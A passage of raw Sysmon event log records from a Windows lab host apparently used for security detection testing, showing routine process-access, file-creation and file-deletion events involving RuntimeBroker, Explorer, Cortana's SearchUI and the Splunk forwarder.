l+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x80000000000000007731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.197{266CAFBE-64C4-6064-9B00-00000000AE01}49246152C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+e5b69|C:\Windows\System32\Windows.Storage.dll+e5cf4|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 11241100x80000000000000007730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.197{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c481c91e-779b-48ca-956c-ea5496485c96}\0.2.filtertrie.intermediate.txt2021-03-31 12:02:36.197 11241100x80000000000000007729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.197{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c481c91e-779b-48ca-956c-ea5496485c96}\0.1.filtertrie.intermediate.txt2021-03-31 12:02:36.197 11241100x80000000000000007728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.197{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c481c91e-779b-48ca-956c-ea5496485c96}\0.0.filtertrie.intermediate.txt2021-03-31 12:02:36.197 11241100x80000000000000007727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.150{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\Appssynonyms.txt2016-04-15 08:09:24.000 23542300x80000000000000007726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.150{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\Appssynonyms.txtMD5=08DBC67378AEDAA933C307D420E3A828,SHA256=A1123799CFB9F6C40E1637FFCD4235C320CFA4B424B58EA68AE3DFE67595793F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.135{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BB6FD426DEF86DAE14BB7D4B9B871D6,SHA256=2B8EBAAB63A5AA91720A25BF1A12967AA028B5312F0F641A2804FE2ECDE70C83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.104{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+ab790|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000007723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.104{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+ab271|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000007722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.088{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132616657559560800.txt2021-03-31 12:02:36.088 10341000x80000000000000007721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\U